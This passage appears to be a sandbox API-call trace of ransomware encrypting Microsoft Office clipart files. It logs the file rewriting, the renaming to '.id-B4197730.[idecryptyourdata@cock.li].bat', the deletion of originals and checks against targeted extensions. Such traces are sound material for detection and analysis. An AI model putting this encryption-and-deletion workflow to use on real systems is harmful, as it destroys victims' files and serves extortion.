[0064.542] CloseHandle (hObject=0x2c8) returned 1 [0064.544] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.544] SetEndOfFile (hFile=0x354) returned 1 [0064.545] CloseHandle (hObject=0x354) returned 1 [0064.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.545] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf")) returned 1 [0064.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0064.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0064.546] lstrlenW (lpString=".doc") returned 4 [0064.546] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.546] lstrlenW (lpString=".docx") returned 5 [0064.546] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.546] lstrlenW (lpString=".pdf") returned 4 [0064.546] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.546] lstrlenW (lpString=".xls") returned 4 [0064.546] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.546] lstrlenW (lpString=".xlsx") returned 5 [0064.546] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.546] lstrlenW (lpString=".ppt") returned 4 [0064.546] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0064.546] lstrlenW (lpString=".zip") returned 4 [0064.546] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.546] lstrlenW (lpString=".rar") returned 4 [0064.546] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.546] lstrlenW (lpString=".bz2") returned 4 [0064.546] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.546] lstrlenW (lpString=".7z") returned 3 [0064.546] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0064.546] lstrlenW (lpString=".dbf") returned 4 [0064.546] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0064.546] lstrlenW (lpString=".1cd") returned 4 [0064.546] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0064.546] lstrlenW (lpString=".jpg") returned 4 [0064.547] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.547] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.547] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0064.547] GetLastError () returned 0x0 [0064.547] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xb88, lpOverlapped=0x0) returned 1 [0064.556] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xb90, lpOverlapped=0x0) returned 1 [0064.556] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.557] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.557] SetEndOfFile (hFile=0x2c8) returned 1 [0064.557] CloseHandle (hObject=0x2c8) returned 1 [0064.558] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.558] SetEndOfFile (hFile=0x354) returned 1 [0064.558] CloseHandle (hObject=0x354) returned 1 [0064.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.559] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf")) returned 1 [0064.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0064.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0064.559] lstrlenW (lpString=".doc") returned 4 [0064.559] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.559] lstrlenW (lpString=".docx") returned 5 [0064.559] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.559] lstrlenW (lpString=".pdf") returned 4 [0064.559] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.559] lstrlenW (lpString=".xls") returned 4 [0064.559] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.559] lstrlenW (lpString=".xlsx") returned 5 [0064.559] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.559] lstrlenW (lpString=".ppt") returned 4 [0064.559] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0064.560] lstrlenW (lpString=".zip") returned 4 [0064.560] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.560] lstrlenW (lpString=".rar") returned 4 [0064.560] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.560] lstrlenW (lpString=".bz2") returned 4 [0064.560] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.560] lstrlenW (lpString=".7z") returned 3 [0064.560] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0064.560] lstrlenW (lpString=".dbf") returned 4 [0064.560] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0064.560] lstrlenW (lpString=".1cd") returned 4 [0064.560] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0064.560] lstrlenW (lpString=".jpg") returned 4 [0064.560] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.560] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.560] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0064.561] GetLastError () returned 0x0 [0064.561] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x5130, lpOverlapped=0x0) returned 1 [0064.585] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x5140, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x5140, lpOverlapped=0x0) returned 1 [0064.587] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.587] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.587] SetEndOfFile (hFile=0x2c8) returned 1 [0064.587] CloseHandle (hObject=0x2c8) returned 1 [0064.588] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.588] SetEndOfFile (hFile=0x354) returned 1 [0064.589] CloseHandle (hObject=0x354) returned 1 [0064.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.590] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf")) returned 1 [0064.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0064.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0064.590] lstrlenW (lpString=".doc") returned 4 [0064.590] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.591] lstrlenW (lpString=".docx") returned 5 [0064.591] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.591] lstrlenW (lpString=".pdf") returned 4 [0064.591] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.591] lstrlenW (lpString=".xls") returned 4 [0064.591] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.591] lstrlenW (lpString=".xlsx") returned 5 [0064.591] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.591] lstrlenW (lpString=".ppt") returned 4 [0064.591] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0064.591] lstrlenW (lpString=".zip") returned 4 [0064.591] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.591] lstrlenW (lpString=".rar") returned 4 [0064.591] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.591] lstrlenW (lpString=".bz2") returned 4 [0064.591] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.591] lstrlenW (lpString=".7z") returned 3 [0064.591] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0064.591] lstrlenW (lpString=".dbf") returned 4 [0064.591] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0064.591] lstrlenW (lpString=".1cd") returned 4 [0064.591] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0064.591] lstrlenW (lpString=".jpg") returned 4 [0064.591] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.592] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.592] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0064.592] GetLastError () returned 0x0 [0064.592] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x8b2, lpOverlapped=0x0) returned 1 [0064.603] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x8c0, lpOverlapped=0x0) returned 1 [0064.604] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.604] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.604] SetEndOfFile (hFile=0x2c8) returned 1 [0064.604] CloseHandle (hObject=0x2c8) returned 1 [0064.605] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.605] SetEndOfFile (hFile=0x354) returned 1 [0064.606] CloseHandle (hObject=0x354) returned 1 [0064.607] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.607] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf")) returned 1 [0064.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0064.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0064.607] lstrlenW (lpString=".doc") returned 4 [0064.607] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.607] lstrlenW (lpString=".docx") returned 5 [0064.607] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.607] lstrlenW (lpString=".pdf") returned 4 [0064.608] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.608] lstrlenW (lpString=".xls") returned 4 [0064.608] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.608] lstrlenW (lpString=".xlsx") returned 5 [0064.608] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.608] lstrlenW (lpString=".ppt") returned 4 [0064.608] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0064.608] lstrlenW (lpString=".zip") returned 4 [0064.608] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.608] lstrlenW (lpString=".rar") returned 4 [0064.608] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.608] lstrlenW (lpString=".bz2") returned 4 [0064.608] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.608] lstrlenW (lpString=".7z") returned 3 [0064.608] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0064.608] lstrlenW (lpString=".dbf") returned 4 [0064.608] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0064.608] lstrlenW (lpString=".1cd") returned 4 [0064.608] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0064.608] lstrlenW (lpString=".jpg") returned 4 [0064.608] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.609] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.609] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0064.609] GetLastError () returned 0x0 [0064.609] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xe6c, lpOverlapped=0x0) returned 1 [0064.635] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe70, lpOverlapped=0x0) returned 1 [0064.636] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.636] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.636] SetEndOfFile (hFile=0x2c8) returned 1 [0064.636] CloseHandle (hObject=0x2c8) returned 1 [0064.637] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.637] SetEndOfFile (hFile=0x354) returned 1 [0064.638] CloseHandle (hObject=0x354) returned 1 [0064.638] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.639] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf")) returned 1 [0064.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0064.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0064.639] lstrlenW (lpString=".doc") returned 4 [0064.639] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.639] lstrlenW (lpString=".docx") returned 5 [0064.639] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.639] lstrlenW (lpString=".pdf") returned 4 [0064.639] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.639] lstrlenW (lpString=".xls") returned 4 [0064.639] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.640] lstrlenW (lpString=".xlsx") returned 5 [0064.640] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.640] lstrlenW (lpString=".ppt") returned 4 [0064.640] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0064.640] lstrlenW (lpString=".zip") returned 4 [0064.640] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.640] lstrlenW (lpString=".rar") returned 4 [0064.640] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.640] lstrlenW (lpString=".bz2") returned 4 [0064.640] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.640] lstrlenW (lpString=".7z") returned 3 [0064.640] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0064.640] lstrlenW (lpString=".dbf") returned 4 [0064.640] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0064.640] lstrlenW (lpString=".1cd") returned 4 [0064.640] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0064.640] lstrlenW (lpString=".jpg") returned 4 [0064.640] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.641] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.641] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0064.641] GetLastError () returned 0x0 [0064.641] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xe30, lpOverlapped=0x0) returned 1 [0065.138] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe40, lpOverlapped=0x0) returned 1 [0065.139] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.139] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0065.175] SetEndOfFile (hFile=0x2c8) returned 1 [0065.175] CloseHandle (hObject=0x2c8) returned 1 [0065.176] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.176] SetEndOfFile (hFile=0x354) returned 1 [0065.178] CloseHandle (hObject=0x354) returned 1 [0065.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.179] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf")) returned 1 [0065.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0065.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0065.179] lstrlenW (lpString=".doc") returned 4 [0065.179] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.179] lstrlenW (lpString=".docx") returned 5 [0065.214] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.216] lstrlenW (lpString=".pdf") returned 4 [0065.216] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.216] lstrlenW (lpString=".xls") returned 4 [0065.216] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.216] lstrlenW (lpString=".xlsx") returned 5 [0065.216] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.216] lstrlenW (lpString=".ppt") returned 4 [0065.216] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0065.216] lstrlenW (lpString=".zip") returned 4 [0065.216] 